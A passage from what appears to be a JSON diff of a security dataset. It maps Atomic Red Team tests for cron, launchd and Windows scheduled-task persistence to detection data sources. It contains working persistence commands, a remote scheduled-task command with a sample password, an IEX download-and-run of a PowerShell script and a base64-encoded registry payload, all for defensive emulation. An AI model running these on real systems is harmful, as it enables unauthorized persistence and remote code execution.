This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1053.003", + "command_list": [ + "crontab -l > /tmp/notevil\necho \"* * * * * /tmp/evil.sh\" > #{tmp_cron} && crontab #{tmp_cron}\n", + "crontab -l > /tmp/notevil\necho \"* * * * * #{command}\" > /tmp/persistevil && crontab /tmp/persistevil\n", + "echo \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.daily/#{cron_script_name}\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.hourly/#{cron_script_name}\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.monthly/#{cron_script_name}\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.weekly/#{cron_script_name}\n", + "echo \"#{command}\" > /etc/cron.daily/persistevil\necho \"#{command}\" > /etc/cron.hourly/persistevil\necho \"#{command}\" > /etc/cron.monthly/persistevil\necho \"#{command}\" > /etc/cron.weekly/persistevil\n", + "echo \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" >> /var/spool/cron/crontabs/#{cron_script_name}\n", + "echo \"#{command}\" >> /var/spool/cron/crontabs/persistevil\n" + ], + "commands": [ + { + "command": "crontab -l > /tmp/notevil\necho \"* * * * * /tmp/evil.sh\" > #{tmp_cron} && crontab #{tmp_cron}\n", + "source": "atomics/T1053.003/T1053.003.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Cron" + }, + { + "command": "crontab -l > /tmp/notevil\necho \"* * * * * #{command}\" > /tmp/persistevil && crontab /tmp/persistevil\n", + "source": "atomics/T1053.003/T1053.003.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Cron" + }, + { + "command": "echo \"echo 'Hello from Atomic Red Team' > 
/tmp/atomic.log\" > /etc/cron.daily/#{cron_script_name}\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.hourly/#{cron_script_name}\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.monthly/#{cron_script_name}\necho \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" > /etc/cron.weekly/#{cron_script_name}\n", + "source": "atomics/T1053.003/T1053.003.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Cron" + }, + { + "command": "echo \"#{command}\" > /etc/cron.daily/persistevil\necho \"#{command}\" > /etc/cron.hourly/persistevil\necho \"#{command}\" > /etc/cron.monthly/persistevil\necho \"#{command}\" > /etc/cron.weekly/persistevil\n", + "source": "atomics/T1053.003/T1053.003.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Cron" + }, + { + "command": "echo \"echo 'Hello from Atomic Red Team' > /tmp/atomic.log\" >> /var/spool/cron/crontabs/#{cron_script_name}\n", + "source": "atomics/T1053.003/T1053.003.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Cron" + }, + { + "command": "echo \"#{command}\" >> /var/spool/cron/crontabs/persistevil\n", + "source": "atomics/T1053.003/T1053.003.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Cron" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.003", + "display_name": "Scheduled Task/Job: Cron", + "atomic_tests": [ + { + "name": "Cron - Replace crontab with referenced file", + "auto_generated_guid": "435057fb-74b1-410e-9403-d81baf194f75", + "description": "This test replaces the current user's crontab file with the contents of the referenced file. 
This technique was used by numerous IoT automated exploitation attacks.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "command": { + "description": "Command to execute", + "type": "String", + "default": "/tmp/evil.sh" + }, + "tmp_cron": { + "description": "Temporary reference file to hold evil cron schedule", + "type": "Path", + "default": "/tmp/persistevil" + } + }, + "executor": { + "name": "bash", + "command": "crontab -l > /tmp/notevil\necho \"* * * * * #{command}\" > #{tmp_cron} && crontab #{tmp_cron}\n", + "cleanup_command": "crontab /tmp/notevil\n" + } + }, + { + "name": "Cron - Add script to all cron subfolders", + "auto_generated_guid": "b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0", + "description": "This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "command": { + "description": "Command to execute", + "type": "String", + "default": "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" + }, + "cron_script_name": { + "description": "Name of file to store in cron folder", + "type": "String", + "default": "persistevil" + } + }, + "executor": { + "elevation_required": true, + "name": "bash", + "command": "echo \"#{command}\" > /etc/cron.daily/#{cron_script_name}\necho \"#{command}\" > /etc/cron.hourly/#{cron_script_name}\necho \"#{command}\" > /etc/cron.monthly/#{cron_script_name}\necho \"#{command}\" > /etc/cron.weekly/#{cron_script_name}\n", + "cleanup_command": "rm /etc/cron.daily/#{cron_script_name}\nrm /etc/cron.hourly/#{cron_script_name}\nrm /etc/cron.monthly/#{cron_script_name}\nrm /etc/cron.weekly/#{cron_script_name}\n" + } + }, + { + "name": "Cron - Add script to /var/spool/cron/crontabs/ folder", + "auto_generated_guid": 
"2d943c18-e74a-44bf-936f-25ade6cccab4", + "description": "This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "command": { + "description": "Command to execute", + "type": "String", + "default": "echo 'Hello from Atomic Red Team' > /tmp/atomic.log" + }, + "cron_script_name": { + "description": "Name of file to store in /var/spool/cron/crontabs folder", + "type": "String", + "default": "persistevil" + } + }, + "executor": { + "elevation_required": true, + "name": "bash", + "command": "echo \"#{command}\" >> /var/spool/cron/crontabs/#{cron_script_name}\n", + "cleanup_command": "rm /var/spool/cron/crontabs/#{cron_script_name}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + 
"target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1053.004", + "command_list": [ + "sudo cp $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist #{script_destination}\nsudo touch /private/var/db/emondClients/#{empty_file}\n", + "sudo cp #{script_location} /etc/emond.d/rules/atomicredteam_T1053_004.plist\nsudo touch /private/var/db/emondClients/#{empty_file}\n", + "sudo cp #{script_location} #{script_destination}\nsudo touch /private/var/db/emondClients/randomflag\n" + ], + "commands": [ + { + "command": "sudo cp $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist #{script_destination}\nsudo touch /private/var/db/emondClients/#{empty_file}\n", + "source": "atomics/T1053.004/T1053.004.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Launchd" + }, + { + "command": "sudo cp #{script_location} /etc/emond.d/rules/atomicredteam_T1053_004.plist\nsudo touch /private/var/db/emondClients/#{empty_file}\n", + "source": "atomics/T1053.004/T1053.004.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Launchd" + }, + { + "command": "sudo cp #{script_location} #{script_destination}\nsudo touch /private/var/db/emondClients/randomflag\n", + "source": "atomics/T1053.004/T1053.004.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Launchd" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.004", + "display_name": "Scheduled Task/Job: Launchd", + "atomic_tests": [ + { + "name": "Event Monitor Daemon Persistence", + "auto_generated_guid": "11979f23-9b9d-482a-9935-6fc9cd022c3e", + "description": "This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. 
\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "script_location": { + "description": "evil plist location", + "type": "Path", + "default": "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist" + }, + "script_destination": { + "description": "Path where to move the evil plist", + "type": "Path", + "default": "/etc/emond.d/rules/atomicredteam_T1053_004.plist" + }, + "empty_file": { + "description": "Random name of the empty file used to trigger emond service", + "type": "String", + "default": "randomflag" + } + }, + "executor": { + "name": "bash", + "elevation_required": true, + "command": "sudo cp #{script_location} #{script_destination}\nsudo touch /private/var/db/emondClients/#{empty_file}\n", + "cleanup_command": "sudo rm #{script_destination}\nsudo rm /private/var/db/emondClients/#{empty_file}\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + 
"target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1053.005", + "command_list": [ + "schtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\"\nschtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\n", + "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST #{time}\n", + "SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST 20:10\n", + "SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"C:\\windows\\system32\\cmd.exe\" /SC daily /ST #{time}\n", + "SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST 20:10\n", + "SCHTASKS /Create /S localhost /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "SCHTASKS /Create /S #{target} /RU DOMAIN\\user /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "SCHTASKS /Create /S #{target} /RU #{user_name} /RP At0micStrong /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "$Action = New-ScheduledTaskAction -Execute \"calc.exe\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTask -InputObject $object\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr 
\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"Word\" -sub \"Scheduler\"\n", + "$xml = [System.IO.File]::ReadAllText(\"PathToAtomicsFolder\\T1053.005\\src\\T1053_005_WMI.xml\")\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"RegisterByXml\" -Arguments @{ Force = $true; Xml =$xml; }\n", + "reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f\nschtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st 07:45\n" + ], + "commands": [ + { + "command": "schtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\"\nschtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST #{time}\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST 20:10\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"C:\\windows\\system32\\cmd.exe\" /SC daily /ST #{time}\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + 
"command": "SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST 20:10\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "SCHTASKS /Create /S localhost /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "SCHTASKS /Create /S #{target} /RU DOMAIN\\user /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "SCHTASKS /Create /S #{target} /RU #{user_name} /RP At0micStrong /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "$Action = New-ScheduledTaskAction -Execute \"calc.exe\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTask -InputObject $object\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"Word\" -sub \"Scheduler\"\n", + 
"source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "$xml = [System.IO.File]::ReadAllText(\"PathToAtomicsFolder\\T1053.005\\src\\T1053_005_WMI.xml\")\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"RegisterByXml\" -Arguments @{ Force = $true; Xml =$xml; }\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + }, + { + "command": "reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f\nschtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st 07:45\n", + "source": "atomics/T1053.005/T1053.005.yaml", + "name": "Atomic Red Team Test - Scheduled Task/Job: Scheduled Task" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1053.005", + "display_name": "Scheduled Task/Job: Scheduled Task", + "atomic_tests": [ + { + "name": "Scheduled Task Startup Script", + "auto_generated_guid": "fec27f65-db86-4c2d-b66c-61945aee87c2", + "description": "Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. 
To view\nthe tasks, open the Task Scheduler and look in the Active Tasks pane.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "schtasks /create /tn \"T1053_005_OnLogon\" /sc onlogon /tr \"cmd.exe /c calc.exe\"\nschtasks /create /tn \"T1053_005_OnStartup\" /sc onstart /ru system /tr \"cmd.exe /c calc.exe\"\n", + "cleanup_command": "schtasks /delete /tn \"T1053_005_OnLogon\" /f >nul 2>&1\nschtasks /delete /tn \"T1053_005_OnStartup\" /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Scheduled task Local", + "auto_generated_guid": "42f53695-ad4a-4546-abb6-7d837f644a71", + "description": "Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "task_command": { + "description": "What you want to execute", + "type": "String", + "default": "C:\\windows\\system32\\cmd.exe" + }, + "time": { + "description": "What time 24 Hour", + "type": "String", + "default": "20:10" + } + }, + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}\n", + "cleanup_command": "SCHTASKS /Delete /TN spawn /F >nul 2>&1\n" + } + }, + { + "name": "Scheduled task Remote", + "auto_generated_guid": "2e5eac3e-327b-4a88-a0c0-c4057039a8dd", + "description": "Create a task on a remote system.\n\nUpon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "task_command": { + "description": "What you want to execute", + "type": "String", + "default": "C:\\windows\\system32\\cmd.exe" + }, + "time": { + "description": "What time 24 Hour", + "type": "String", + "default": "20:10" + }, + "target": { + "description": "Target", + "type": "String", + "default": "localhost" + }, + "user_name": { + 
"description": "Username to authenticate with, format: DOMAIN\\User", + "type": "String", + "default": "DOMAIN\\user" + }, + "password": { + "description": "Password to authenticate with", + "type": "String", + "default": "At0micStrong" + } + }, + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN \"Atomic task\" /TR \"#{task_command}\" /SC daily /ST #{time}\n", + "cleanup_command": "SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN \"Atomic task\" /F >nul 2>&1\n" + } + }, + { + "name": "Powershell Cmdlet Scheduled Task", + "auto_generated_guid": "af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd", + "description": "Create an atomic scheduled task that leverages native powershell cmdlets.\n\nUpon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "$Action = New-ScheduledTaskAction -Execute \"calc.exe\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTask -InputObject $object\n", + "cleanup_command": "Unregister-ScheduledTask -TaskName \"AtomicTask\" -confirm:$false >$null 2>&1\n" + } + }, + { + "name": "Task Scheduler via VBA", + "auto_generated_guid": "ecd3fa21-7792-41a2-8726-2c5c673414d3", + "description": "This module utilizes the Windows API to schedule a task for code execution (notepad.exe). 
The task scheduler will execute \"notepad.exe\" within\n30 - 40 seconds after this module has run\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ms_product": { + "description": "Maldoc application Word", + "type": "String", + "default": "Word" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft #{ms_product} must be installed\n", + "prereq_command": "try {\n New-Object -COMObject \"#{ms_product}.Application\" | Out-Null\n $process = \"#{ms_product}\"; if ( $process -eq \"Word\") {$process = \"winword\"}\n Stop-Process -Name $process\n exit 0\n} catch { exit 1 }\n", + "get_prereq_command": "Write-Host \"You will need to install Microsoft #{ms_product} manually to meet this requirement\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n", + "name": "powershell" + } + }, + { + "name": "WMI Invoke-CimMethod Scheduled Task", + "auto_generated_guid": "e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b", + "description": "Create an scheduled task that executes 